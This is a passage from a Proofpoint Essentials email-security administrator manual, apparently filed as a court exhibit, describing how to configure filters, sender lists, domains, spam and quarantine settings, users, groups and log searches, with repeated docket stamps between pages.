   *Hide Logs from Non-Admin Users: Will hide the log from the users view. The email will still be visible to the administrator.*

   *Stop Processing Additional Filters: Will stop processing any additional filters that normally would have been applied.*

   *Require Admin Privileges to Release: Requires an administrator to release.*

*Enforce Completely Secure SMTP Delivery: Will force delivery over TLS without an unencrypted fallback. Will check for a valid certificate for the recipient domain.*

*Enforce only TLS on SMTP Delivery: Will force delivery over TLS without an unencrypted fallback. Strip Subject Line Encryption Terms: Will strip terms from the email when identified in a Subject Line condition.*

16. Enter a description (Optional).
17. Click Save.

*To edit a filter:*

1. Click on the Company Settings tab.
2. Click on the Filters tab.
3. Click the Edit icon next to the filter you with to edit.



4. Make appropriate changes.
5. Click Save.

*To duplicate an existing filter:*

1. Click on the Company Settings tab.
2. Click on the Filters tab.
3. Click the Duplicate icon next to the filter you with to edit.



4. Make appropriate changes.
5. Click Save.

*To delete a filter:*

1. Click on the Company Settings tab.
2. Click on the Filters tab.
3. Click the Delete icon next to the filter you with to delete.



*To disable / enable a filter:*

1. Click on the Company Settings tab.
2. Click on the Filters tab.
3. If enabled, click the slider next the filter you wish to disable. If disabled, click the slider next to the filter you wish to enable.



*To search for a filter:*

1. Click on the Company Settings tab.
2. Click on the Filters tab.
3. Type in a domain, email address or a portion of the name/description of the filter in the search field. *Results are dynamically returned as you type.*

## Sender Lists

Sender lists are simple filters that are used for specifying addresses or domains that should be allowed or blocked. Sender lists support the following entries:

- Domains ○ *@domain.com
- Email Addresses ○ name@domain.com
- IP Addresses ○ 10.20.0.4 ○ 10.20.*.4 ○ 10.*.*.* ○ *.20.*.4 ○ 10.0.62.0/24

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 683 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 25 of
726

In instances where a single message contains competing actions the following priority logic is used to determine the appropriate action:

- IP Address > Email > Wildcard Domain > Wildcard IP > IP (CIDR)

*Add entry to Organization Safe Sender List*

1. Click on the Company Settings tab.
2. Click on the Sender Lists tab.
3. Enter the address or domain into the Safe Sender List text area.

   *You can add multiple entries by using a comma, semi-colon or one per line.*

4. Click Save.



*Add entry to Organization Blocked Sender List*

1. Click the Company Settings tab.
2. Click the Sender Lists tab.
3. Enter the address or domain into the Blocked Sender List text area.

   *You can add multiple entries by using a comma, semi-colon or one per line.*

4. Click Save.



*Note: Sender Lists are available at the organization, group and user level. To add an entry to a group or user, navigate to the user profile and you can follow the same steps as outlined above.*

## Domains

Every Internet email address includes a domain, which specifies where mail should be sent. For instance, the address joe@mycompany.com directs a message to the user Joe in the domain mycompany.com. In order for a domain to receive filtering from the message filtering service, that domain must be added to one of the organizations in your service. At least one domain was added as part of customer creation process.

Adding a domain to an organization facilitates the following:

24

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 684 of 726

- Allows the message-filtering layer to accept mail traffic for the domain.
- Associates the domain with a destination configuration, which holds delivery information for your mail server and any failover sites that are enabled.
- Associates the domain with a destination.
- Sets a default domain for new users.
- Associates the domain with an organization's default settings for functionality such as SMTP Discovery, Active Directory Discovery and filtering.

When you associate a domain with an organization, keep the following in mind as you decide in which organization you want to locate a domain:

a)   All domains must deliver email to the same destination servers in order to qualify as alias domains.
b)   Domains should only have failover destination sites defined if the failover site is available at all times.
c)   The system will prevent you adding users without having previously added the domain associated with the user address.
d)   An administrator must have authorization over the organization containing the domain to manage the users and domain.
e)   A domain and its users must be in the same organization.
f)   You cannot add a domain that has already been previously added to the platform.

## Domain Purpose

Domain purpose is used to differentiate between domains that are used for email relay and domains that are used for management purpose only. Domain purpose is a required when creating a new domain.

For Organizations, the default domain purpose will be Relay. The purpose can be changed when creating or editing a domain.

## Searching for a Domain

If you manage a large number of domains, you can find them by using the Search field on the top of the page or by using the search field in the customer list. The returned results will present the organization name in which the searched domain match is located. When you run a search, you see all the organizations that contain domains matching your search criteria. Search results show up to 1,000 results. If necessary, the results are displayed on multiple pages.

*To view the domains for a specific organization:*

1.   Click the Company Settings tab.
2.   Click the Customers tab.
3.   Click on the customer name.
     *By clicking on the customer name you will be directed to the customer site and see the customer Profile page.*
4.   Click on the Domains tab.

Follow these steps to add a domain before you change your MX records for that domain. If you change your MX records before these steps are completed, you may lose mail.

*To add a domain:*

1.   Click New Domain.
2.   Enter the domain name.
3.   Change the domain purpose (Optional).
     *If domain purpose is management than proceed to step 6.*
4.   Enter the destination IP address or hostname for the domain.
5.   (Optional) Enter the failover IP address or hostname for the domain.
6.   Click Save.

Domain changes are reflected system wide every half hour.

*To test a domain:*

1.   Click the test icon next to the domain you wish to test.

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSD Docket 02/26/2020   Page 685 of 726





2.  Review test results.

    *MX Records: Will check the MX records for the domain and indicate whether they are correct (pointing to the Proofpoint Essentials service)*

    *SMTP Destination: Will check to ensure Proofpoint Essentials can connect to destination over port 25.*

3.  Click Close.

*To edit a domain:*

1.  Click the edit icon next to the domain you wish to edit.



2.  Make appropriate changes.
3.  Click Save.

Domain changes are reflected system wide every half hour.

*To delete a domain:*

1.   Click the delete icon next to the domain you wish to delete.



Domain changes are reflected system wide every half hour.

## Outbound Filtering

The Proofpoint Essentials platform will accept email for outbound relay when the following conditions are met:

1.  Email sent from a preregistered static IP address.
2.  Email is sent from a registered domain corresponding to the preregistered static IP address.
3.  The Email is sent from a registered users email address (unless SMTP Discovery is enabled).

Before you can add an outbound IP address, make sure the Outbound filtering option is enabled.

*To enable outbound filtering feature:*

1.  Click the Company Settings tab.
2.  Click on the Features tab.
3.  If the Enable Outbound Relaying checkbox is unchecked, check it.
4.  Click Save.

*To add an outbound IP address:*

1.  Click the Company Settings tab.
2.  Click the Domains tab.
3.  Click Add New Sending Server.
4.  Type in the IP address.
5.  Click Save.
6.  Repeat for additional addresses.

In addition to adding a standard IP address Proofpoint Essentials also supports CIDR notation (A.B.C.D/n). Simply type in the CIDR value in the text field provided.

Domain changes are reflected system wide every half hour.

*To edit an outbound IP address:*

1.  Click the Company Settings tab.

26

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 28 of 34

2.    Click the Domains tab.
3.    Click Edit next to the IP you wish to edit.
4.    Update the IP address.
5.    Click Save.

Domain changes are reflected system wide every half hour.

### *To delete an outbound IP address:*

1.    Click the Company Settings tab.
2.    Click the Domains tab.
3.    Click Delete next to the IP you wish to edit.

Domain changes are reflected system wide every half hour.

## Managed Hosted Services

If the organization uses a managed hosted service, such as Office365 or Google Apps, than Proofpoint Essentials can automatically manage the service IP addresses.

### *To enable a hosted service:*

1.    Click the Company Settings tab.
2.    Click the Domains tab.
3.    Click the Manage Hosted Services button.
4.    Click the enable control.
5.    Click Save.

*Once enabled the service will appear in the Sending Servers table.*

### *To view the current list of IPs for the Managed Service:*

1.    Click the Company Settings tab.
2.    Click the Domains tab.
3.    Click the View button.
4.    Click the Close button to close the window.

### *To remove a previously enabled managed service:*

1.    Click the Company Settings tab.
2.    Click the Domains tab.
3.    Click the delete button next to the managed service you wish to remove.

### *To disable a previously enabled managed service:*

4.    Click the Company Settings tab.
5.    Click the Domains tab.
6.    Click the Manage Hosted Services button.
7.    Click the disable control.
8.    Click Save.

*Once disabled the service will be removed from the Sending Servers table.*

## URL Defense

URL Defense protects organizations from accessing known malicious sites by locating and replacing URLs found within the message body with a separate URL. If users click on a known malicious URL instead of being directed to the original URL they are instead directed to a page informing that the site is not safe and been blocked. Organizations can manage their URL Defense configuration as needed.

![proofpoint essentials]

*To configure DKIM settings:*

DKIM is an email validation system designed to detect email spoofing. It provides a mechanism to allow mail systems to check that incoming mail from a domain has not been modified during transport. Many hosted mail systems today employ this technique in their email delivery process. If this setting is enabled URLS found in DKIM signed messages will be re-written.

1. Click on Company Settings.
2. Click on URL Defense.

*URL Defense must be enabled in order to see this tab.*

3. Check the checkbox to re-write DKIM signed messages.

*To re-write URLs that are not located in an anchor tag:*

Anchor tags <a> are used in HTML to tell a browser or email client where to direct the user when a piece of content, such as a website URL, is clicked. If this setting is enabled, these links will be rewritten.

1. Click on Company Settings.
2. Click on URL Defense.
3. Check the checkbox to re-write URLS that are located in an anchor tag.

*To exclude domains from being re-written:*

Organizations can specify one or more domains and/or IP addresses that, when found in a message URL, will not be re-written.

1. Click on Company Settings.
2. Click on URL Defense.
3. Type in the domain or IP into the text area field provided.

*Separate entries by including a comma, semi-colon or putting entries on each line.*

*To exclude all organization active domains:*

1. Click on Company Settings.
2. Click on URL Defense.
3. Check the checkbox to exclude all active domains associated with the organization.

## Spam

Spam filtering is enabled by default. However, customers can customize spam settings to be more or less aggressive.



*To view spam threshold:*

1. Click on the Company Settings tab.
2. Click on the Spam tab.

*The current spam threshold will be seen next to "Current Trigger Level".*

28

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSD Docket 02/26/2020   Page 688 of 726

You can adjust the sensitivity of the spam-filtering engine by lowering or increasing the current trigger level. The lower the number the more aggressive the filter, the higher number the less aggressive.

*To adjust spam threshold:*
1. Click on slide control button.
2. Move left to increase sensitivity or right to decrease sensitivity.

## Quarantine Bulk Email

If this option is enabled, Proofpoint Essentials will quarantine emails that are detected as being "bulk" email.

## Quarantine email suspected of being phish

If this option is enabled, Proofpoint Essentials will penalize emails to a degree that they will likely be quarantined.

## Require administrator privileges to release suspected phishing email

If this option is enabled, end-users will be unable to release emails that have been quarantined as a result of a high phish score.

## Stamp & Forward

If this option is enabled, Proofpoint Essentials will still filter messages for spam. However, instead of moving suspected spam to the quarantine, a configurable text value (default: "***Spam***") is appended to the subject line and the email is delivered to intended recipient. This setting can be enabled at the company or user level. The options available for this setting are:

- No: The option is disabled.
- Partial: This option is enabled for emails whose spam score is between 9 and 19.
- All: The option is enabled and applies to all mail.

## Easy Spam Reporting

If this option is enabled, a single line disclaimer will be appended to each inbound email processed by Proofpoint Essentials The disclaimer will be added to the bottom of each HTML and text email with a link to the Proofpoint Essentials quarantine area. This allows the recipient of an unwanted email to report it directly to Proofpoint Essentials from within the email itself, causing Proofpoint Essentials' spam engines to learn that the reported email was unwanted by this user and to update it's learning to accommodate this for this user in future.

The disclaimer reads:

"This email has been scanned for spam and viruses by Proofpoint Essentials cloud email security - click here to report this email as spam."

By clicking on the embedded link the user will be directed to the Proofpoint Essentials login screen. Once they login, the email will be reported as misclassified. In addition, the user can also create a filter to block email from the sender or sender domain.

## Quarantine inbound email sent by active domains associated with this organization

If this option is enabled suspected imposter emails that are identified as inbound messages from the Internet where the "from" domain is one of the company's internal domains, will be quarantined.

You can add IP addresses to the organizations safe sender list or create a custom filter in order by-pass this setting for emails from approved senders, such as an externally delivered marketing communication.

## Update Spam Detection Settings

If the "Update spam detection settings above for all existing user accounts" checkbox is checked, the organization's spam settings will replace any end-user settings that have been defined. If this setting is not selected than there will be no changes applied to the Spam settings your existing users.

**Inbound Sender DNS**

The "Inbound sender DNS sanity checks" provides an additional layer of protection against spam and helps ensure that inbound messages that might not have a destination to bounce to are not allowed in. This setting forces two additional DNS checks:

1. Whether the sender domain has MX records.
   - A check whether the email is bounceable and able to be returned to a sender should it be necessary later.
   - The request will get rejected if the MAIL FROM domain has:
     a. no DNS A or MX record, or
     b. a malformed MX record such as a record with a zero-length MX hostname
2. Whether the sender domain contains MX records pointing to private or reserved IP ranges (e.g. 10.0.0.0/8, 127.0.0.0/8 etc.)
   - The request will be rejected if the sender domain MX points to an IP address of an internal network.


While Proofpoint Essentials recommends this option remain enabled, disabling this option does not pose a significant risk.


Proofpoint Essentials allows you to manage these settings at the user level. Please go to Managing Users & Groups / Configuration Options for Users and Groups to learn more how to make changes.


## Digests

Digests are used to allow end users to easily view a list of emails that have been quarantined. Users can review the digest and choose to take additional actions for each quarantined email. The digest allows users to take the following actions when viewing a quarantined email:

- Release Once: Allows user to release a specific email from a sender one time. This may be an email newsletter that they do not want to receive regularly or an email from a source that you feel may be a legitimate source. The release function does not update the Proofpoint Essentials spam-learning engine and does not create any rules in relation to the sender.
- Release Always: Allows the user to have the desired message released immediately and inform Proofpoint Essentials to create an Allow filter between the sender and recipient so that mail will not be qualified as Spam from this sender in future.

*To view current digest settings:*

1. Click on the Company Settings tab.
2. Click on the Digests tab.

The digest options can be adjusted to suit each customer. These options can be applied to users directly. To manage a users spam threshold, go to Managing Users & Groups / Configuration Options for Users and Groups.

### Receive Quarantine Digests

Specifies if a summary report is generated or not.

### Only include messages quarantined since the last Quarantine Digest was sent

Specifies that the Quarantine digest will only be delivered when new messages have been quarantined since the last report was run.

### Quarantine Digest delivery start time

Specifies when the digest delivery schedule starts. For example, if you choose 08:00, the delivery time will be at 8:00 AM and the interval (see below) will be based off the start time. The time represented is based on the time-zone of the account.

### Interval between Quarantine Digest checks

Specifies the frequency of the quarantine digest delivery. The default value is set to 24 hours but there are options for 12 hours, 8 hours, 6 hours and 4 hours. The quarantine digest is sent out at 3:00 AM local time (depending on the time zone configuration of the company) and at other times throughout the day depending on the interval selected.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 690 of 726

## Retention period

Defines the period of time messages are retained in the Quarantine.

## Include messages that have been quarantined by

If selected will include messages that have been quarantined as a result of a company, group or end user filter or sender list block entry.

## Exclude messages from the Quarantine Digest that are most likely to be spam

If selected any message that scores the highest possible spam score will not be included in the quarantine digest. Effected messages will still be visible in the user's web-based quarantine view.

### Update Quarantine Digest Settings

If the "Update Quarantine Digest settings for all existing user accounts" checkbox is checked, the company quarantine digest settings will replace any end-user settings that have been defined.

Proofpoint Essentials allows you to manage these settings at the user level. Please go to Managing Users & Groups / Configuration Options for Users and Groups to learn more about how to make changes.

## Notifications

Proofpoint Essentials allows organizations to localize and customize the content of end-user system emails including the welcome email, password reset email and the quarantine digest. Content can be localized for the following languages:

- English (US)
- English (UK)
- Spanish • French
- German

*To view default notification templates:*

1. Click on the Company Settings tab.
2. Click on the Notifications tab.

   *Templates for all supported notification languages are displayed by default. You can limit the view to a specific language by selecting a value from the language drop-down.*

*To edit a notification template:*

1. Click on the Company Settings tab.
2. Click on the Notifications tab.
3. Click on the "pencil" icon next to the template you wish to edit.



*You will be directed to the Edit page of the template you selected.*

4. Edit the subject line of the template (Optional). 5.     Click on the section of content you wish to edit.

   *Use the "pencil" icon to determine what portion of the content you can edit. Click on the area to enter edit mode.*

Case 0:20-cv-60416-AMC   Document 3-1   Entered on FLSB Docket 02/26/2020   Page 691 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 33 of
726



6. Click Apply to apply the changes you have made.

7. Modify the content as needed.

8. Click Save or Cancel.

   *By clicking Save you are updating the system default template for the notification you have updated. You can restore any custom template in order to change it back to an earlier version.*

*To restore a template to the system default content:*

1. Click on the Company Settings tab.

2. Click on the Notifications tab.

3. Templates that have been edited will have a "restore to default" icon next to the "preview" icon.

4. Click the "Restore to Default" icon.



5. Click OK.

## Content Tags

A content tag is used to populate an email with system content such as first name, surname, primary SMTP address, etc. This can be very useful to ensure the email is personalized for the end user.

*To add a content tag to a notification template:*

1. Click on the Company Settings tab.

2. Click on the Notifications tab.

3. Edit a template and content section.

4. Select a tag from the –tags—drop-down menu.

   *The tag will be added where the cursor is located.*

5. Move the tag (i.e., copy & paste) to where you would like it to be replaced by system-inserted content.

6. Click Save or Cancel.

## Notifications for Groups

Users can receive notifications in a different language than the organization that they belong to. For example, an organization can be set with English as the notification language. But users in the Paris office can be setup to receive notifications in French. This is

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 34 of 726

managed through the use of Groups. For more information about Groups, please go to Managing Users & Groups / Configuration Options for Users and Groups to learn more.

*To enable a group of users to receive notifications in another language (than the organization):*

1.  Click on the Users & Groups tab.
2.  Click on the Groups tab.
3.  Click the Add a Group button.
4.  Add users to the group.
5.  Select the language from the language drop-down.
6.  Click Save or Cancel.

*The users in the group will now receive notifications based on the language selected.*

## Disclaimer

Proofpoint Essentials has made it even more convenient for customers to append an outbound disclaimer to all emails coming from an organization. We also offer the ability to have multiple outbound disclaimers depending on your department or your position within the company. You can even use different disclaimers for different groups of users (i.e. sales, support, marketing).

The order of disclaimer preference is as follows:

•  The organization disclaimer is applied to all registered users
•  The organization disclaimer is replaced by a user or group disclaimer (if present)
•  The group disclaimer is replaced by a user disclaimer (if present)

Disclaimers can be created in both HTML and plain text using a standard WYSIWYG editor to compose email disclaimers with the ability to include externally hosted images.

Before you can add a disclaimer you will need to enable the disclaimer option in the Features section.

*To enable Disclaimers:*

1.  Click on the Company Settings tab.
2.  Click on the Features tab.
3.  Check the Disclaimer checkbox.
4.  Click Save.

*To add a Disclaimer:*

1.  Click on Company Settings tab.
2.  Click on the Disclaimer tab.
3.  Copy/Paste/Edit your content using the WYSIWYG editor.
4.  Click Save.

Disclaimer related changes are reflected system wide at the top of each hour.

Proofpoint Essentials allows you to create user and group specific disclaimers. Please go to Managing Users & Groups / Configuration Options for Users and Groups to learn more.

## Social

Social Media Account Protection, powered by Proofpoint's Nexgate division, enables organizations to prevent account hacks, automatically remove malicious or inappropriate content, prevent unauthorized publishing applications, enforce compliance policy in real-time, and enable intelligent message archival.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 35 of 726

Social Media Account Protection is available to Advanced and Professional package subscribers only.

*To enable Social Media Account Protection:*
1.   Click on the Company Settings tab.
2.   Click on the Features tab.
3.   Check the checkbox next to Enable Social Media Account Protection.
*Once enabled, the organization administrator will receive an email from Nexgate with login and setup instructions.*

## Access Control

The Access Control page is used to limit the permissions of a system role that is assigned to a user who has rights to access Proofpoint Essentials. There are 5 roles available to Proofpoint Essentials users and they operate with the following permission model:

- Organization Administrator - End-User

*To modify the access control for a role:*
1.   Navigate to the login screen.
2.   Login using your account.
3.   Click on the Company Settings tab.
4.   Click on the Access Control tab.
5.   Select the role you wish to edit.
6.   Click the Show/Hide button that is next to each module you wish to alter the permission setting for that role.
7.   Click Save.

Once the change has been made all users who are assigned the role that has been edited will be subject to the new permissions.

# Using Templates

Templates can be used to create common settings that are applied to a new account. When creating a new customer, you can select a template and all template settings will be applied.

Templates settings are applied during the customer creation. If a change is made to a template, it will be applied to all new customers created using the template. It will not apply to existing customers that were built using the template.

Each template has a template name and a template id. The template id can be used when provisioning a customer through Proofpoint Essentials Rest APIs. Information about Rest APIs is not included in this document.

All templates are initially disabled and will not appear in the customer creation wizard. They must be enabled before they will be visible in the customer creation workflow.

*To create a template:*
1.   Navigate to the login screen.
2.   Login using your account.
3.   Click on the Customers tab.
4.   Select the Templates tab.
5.   Click on New Template button.
6.   Enter the name of the template.
7.   Choose the package.
8.   Click on the Create Package button.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 36 of
54

**proofpoint**
*essentials*

*To edit a template:*

1. Click on the edit icon next to the template you wish you edit.



   *This will launch the Edit Template screen. You can now move through each tab to configure the settings you want to associate with your template.*

2. Click on each tab you wish to make changes to.

   *Profile: Adjust default customer profile information.*

   *Features: Enable or disable features.*

   *Discovery: Configure SMTP Discovery settings.*

   *Filters: Create organization wide filters.*

   *Sender Lists: Add safe and/or blocked sender list entries.*

   *Domains: Specify sending servers including managed hosted services.*

   *Notifications: Customize notification content. Access: Customize access controls.*

3. *Once you have made all the necessary changes to the template, click Done Editing or you can switch to another template by selecting the template name within the drop-down list.*

*To disable / enable a template:*

1. Click the slider next to the template you wish to enable or disable.



*To delete a template:*

1. Click the delete icon next to the template you wish to delete.



*To search for a template:*

1. Enter the name of the template in the search field.

   *Search results are returned as the template name is typed.*

*To view templates by package type:*

1. Select the package type you wish to view using the drop-down list control on the Templates page. *Beginner: If selected will display templates that are associated with the beginner package.*

   *Business: If selected will display templates that are associated with the business package.*

   *Advanced: If selected will display templates that are associated with the advanced package.*

   *Professional: If selected will display templates that are associated with the professional package.*

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSB Docket 02/26/2020   Page 37 of 36



# *Managing Users & Groups*

*In this chapter, you'll find the following topics:*
- Understanding Roles
- Managing Users
- Managing Groups
- Export Users
- Configuration Options for Users and Groups

## Understanding Roles

There are several roles that users can be assigned. They include:

### Organization Administrator

A user with the Organization Admin role is able to:
- Manage organization site

### End User

A user with the end-user role:
- Can login to the Proofpoint Essentials user interface
- Can access their Emergency Inbox
- Receives daily quarantine digest

### Silent User

A user with the silent user role:
- Cannot login to Proofpoint Essentials
- Cannot access an Emergency Inbox
- Receives daily quarantine digest

## Managing Users

Users and groups are accessed under the Users & Groups tab.  Users and groups can be added manually or through LDAP Discovery or CSV upload.

An administrator can add a user and group by providing basic details through a web form. Users can only be added if their SMTP address domain has already been registered.



*To dd user:*

1. Click on the Users & Groups tab.
2. Click on the Users tab.
3. Click on Add a User button.
4. Fill in the required information (*Required Fields*). *First Name: The first name of the user.*

   *Surname: The last name (surname) of the user.*

   *Email Address: The primary email address of the user.*

   *User Privileges: The role of the user.*

   *Mobile number: A mobile number for the user.*
5. Click Save.

When you create an End-User a welcome email is sent by default. Users will be directed to click on an encoded URL in order to set their own password.

*To reset a user's password:*

1. Click on the Users & Groups tab.
2. Click on the Users tab.
3. Locate the user you wish to update.
4. Click the users name or the edit button.
5. Click on Reset Password.

   *This will automatically send user an email with a link to create a new password.*

*To update a user:*

1. Click on the Users & Groups tab.
2. Click on the Users tab.
3. Locate the user you wish to update.
4. Click the users name or the edit button.
5. Update information as needed.
6. Click Save.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 39 of 726

*To delete a user:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Locate the user you wish to delete.
4.   Check the checkbox next to the user.
5.   Click the Select list and select Delete.
6.   Click Apply.

*To add an alias to a user:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to add the alias to.
4.   Click on the Aliases tab.
5.   Click Add Alias.
6.   Type the alias into the text box.
7.   Click Save.
8.   Repeat as necessary.

## Managing Groups

Groups can be used to apply specific filters or append disclaimers. If you are using LDAP Discovery to sync with Active Directory, mail-enabled groups will automatically be created. You can also create and manage groups manually if needed.

*To create a group:*

1.   Click on the Users & Groups tab.
2.   Click on the Groups tab.
3.   Click on Add a Group button.
4.   Enter a group name and description.
5.   Select a group language (or leave it as default)
6.   Click Save.

*To add users to a group:*

1.   Click on Users & groups tab.
2.   Click on the Groups tab.
3.   Click on the Group name.
4.   Click the Add Members tab.
5.   Check the checkbox next to the user you wish to add to the group.
6.   Click Add.

*To remove users from a group:*

1.   Click on Users & groups tab.
2.   Click on the Groups tab.
3.   Click on the Group name.
4.   Click the Remove Members tab.
5.   Check the checkbox next to the user you wish to remove from the group.
6.   Click Remove.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 40 of
726

*To delete a group:*

1.   Click on Users & groups tab.
2.   Click on the Groups tab.
3.   Check the checkbox next to the group you wish to delete.
4.   Click the Select list and select Delete.
5.   Click Apply.

## Export Users

You can export users from Proofpoint Essentials to a CSV file. The export includes basic user information (email address, first name,
last name) and all associated aliases.

*To export a list of users:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on CSV Export button.

Note: If the export contains entries that contain non-ascii characters, than you may experience issues when importing data into
some spreadsheet applications. A UTF-8 capable text editor will be able to display the data properly.

## Configuration Options for Users and Groups

You may need to treat certain users and/or groups of users differently than the rest of the organization. Proofpoint Essentials allows
you to apply user-specific configurations to spam settings and quarantine digest as well as create custom filters and disclaimers.

**Users**

*To adjust a user's spam settings:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Spam Settings tab.
5.   Make necessary adjustments.
6.   Click Save.

For more information about spam settings, please refer to: [Managing Customers / Configuration Options for Customers / Spam](#).

*To adjust a user's disclaimer preferences:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Digests tab.
5.   Make necessary adjustments.
6.   Click Save.

For more information about digests, please refer to: [Managing Customers / Configuration Options for Customers / Digests](#).

*To force the delivery of the digest for a user:*

1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Digests tab.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 699 of
726

proofpoint
essentials

5.   Click Send Digest.

*To create a disclaimer for a user:*
1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Disclaimer tab.
5.   Copy/Paste/Edit your content using the WYSIWYG editor.
6.   Click Save.

For more information about disclaimers, please refer to: Managing Customers / Configuration Options for Customers / Disclaimer.

*To create a filter for a user:*
1.   Click on the Users & Groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Filters tab.
5.   Click on Add a Filter (or Add the First Filter)
6.   Enter the filter information
     *Note: The filter scope is set to the user.*
7.   Click Save.

For more information about filters, please go refer to: Managing Customers / Configuration Options for Customers / Filters.

*To add an entry to Safe and/or Blocked sender lists:*
1.   Click on the Users & groups tab.
2.   Click on the Users tab.
3.   Add an SMTP Address (user@domain.com) or Domain (*@domain.com) to the proper table *Note: Safe Sender List will mean emails from specified senders will not be scanned for Spam. Blocked Sender List will mean all emails from specified senders will be quarantined.*
4.   Click Save.

*To create a custom Access Control for a user:*
1.   Click on the Users & groups tab.
2.   Click on the Users tab.
3.   Click on the name of the user you wish to manage.
4.   Click on the Access Control tab.
5.   If you have not created an access control for the User, click on the Add Access Control button. If an Access Control has already been created, skip to Step 7.
6.   Click the Add Access Control button.
7.   Click the Show / Hide button next to each control that you wish to edit.
     *Note: User Access Controls take priority over Role Access Controls. For example: If End-Users have Hide set for the Spam tab but a specific user has Show set for the Spam tab, user will see the Spam tab and all other users will not see the Spam tab.*
8.   Click Add.

Case 0:20-cv-60416-AMC   Document 3-1 Entered on FLSB Docket 02/26/2020   Page 700 of
726
Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 42 of
54

**Groups**

*To create a disclaimer for a group:*

1.   Click on the Users & Groups tab.

2.   Click on the Groups tab.

3.   Click on the name of the group you wish to manage.

4.   Click on the Group Disclaimer tab.

5.   Copy/Paste/Edit your content using the WYSIWYG editor.

6.   Click Save.

For more information about disclaimers, please refer to: Managing Customers / Configuration Options for Customers / Disclaimer

*To create a filter for a group:*

1.   Click on the Users & Groups tab.

2.   Click on the Groups tab.

3.   Click on the name of the group you wish to manage.

4.   Click on the Group Filters tab.

5.   Click on Add a Filter (or Add the First Filter)

6.   Enter the filter information

     *Note: The filter scope is set to the group.*

7.   Click Save.

For more information about filters, please refer to: Managing Customers / Configuration Options for Customers / Filters.

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 43 of 726



# Accessing Additional Features

*In this chapter, you'll find the following topics:*

- Using Email Logs
- Instant Replay
- System Alerts
- Accessing Emergency Inbox
- Reports

## Using Email Logs

As the Proofpoint Essentials platform processes a message, data about the message is captured and stored in a log. The log search feature enables you to run searches on this data using different criteria. You can then view the search results and drill down to details about specific messages.

Use the log search to track messages for inbound and outbound traffic, and to track all messages for a specific sender, recipient, domain, or sub domain. You can also use log search to confirm whether a specific filter was triggered by a message and confirm the status of processing. If necessary, you can later analyze filter settings that may be affecting traffic.

**Searching Logs**

Access to an organizations email logs depends on your account privilege level.  Access to log search is granted initially to all accounts for their own email addresses only; Organization & Channel administrators have the ability to search logs for all licensed users and their respective email addresses.



Please note: Logs contain information about email messages processed and not the actual message itself.

*To search logs for a specific user:*

1. Click on the Logs tab.
2. Click the user whose logs you wish to search.
3. Choose type.
   *Inbound: Will search against all inbound email.*
   *Outbound: Will search against all outbound email.*
4. Choose date range. *Today*
   *Today and Yesterday*
   *The Last week*
   *The Last 2 weeks*
   *The Last 30 days*

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 44 of 726



5. Choose status

   *Any: Will display any email associated with the user.*

   *Quarantined: Will display email that belongs to the user and was quarantined.*

   *Reported (misclassified): Will display email that was reported by the user as spam.*

   *Blocked: Will display email that was blocked by Proofpoint Essentials.*

   *Cleared: Will display email that was cleared by Proofpoint Essentials.*

   *Cleared (But Queued for delivery): Will display email that was cleared by Proofpoint Essentials but has not yet been delivered.*

   *Cleared (but Bounced by destination): Will display email that was cleared but was bounced by destination. Cleared (Released from quarantine): Will display email that was cleared based on the action of a user or administrator*

6. Enter sender, recipient and/or subject content.

   *Wildcard Domains are supported (format: domain.com)*

7. Click Search.

Advanced search options are available. This will add the ability to search based on additional categories such as:

- Filtered: Block - Display emails that have been blocked by a filter
- Spam - Display emails that have been classified as spam
- Virus - Display emails that have been identified as containing a virus
- Clean - Display emails that have been classified as clean
- Filtered: Allow - Display emails that have been cleared by a filter

*To search logs for all licensed users:*

1. Click on the Logs tab.
2. Click on the Licensed Users tab.
3. Choose Search Options.
4. Click Search.

## Viewing Search Results

Once you perform a search the system will execute the criteria against the log data and return search results to the screen. You can adjust the criteria if necessary and perform a new search.

*Please note: There is a 1,000 record limit for search results.*

The search results are displayed in a table and detailed information about each message is displayed including: •     From (Includes both **'From' Header** and Envelope Sender when available.)

- To
- Subject
- Date/Time
- Category
- Size
- Status

*To view details about a specific message:*

1. Locate the message you wish to view.
2. Click on the Detail button next to the message in question.

*A pop-up window will appear and include a variety of information about the email. In addition, you can create filters to block content directly from this screen.*

Case 0:20-cv-60416-XXXX   Document 1-47   Entered on FLSD Docket 02/26/2020   Page 45 of 54

*To create a filter from the message detail screen:*

